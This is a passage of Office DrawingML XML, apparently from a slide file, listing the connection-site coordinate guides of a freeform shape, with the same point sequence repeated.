              <a:gd name="connsiteY98" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2402874 h 6858000"/>
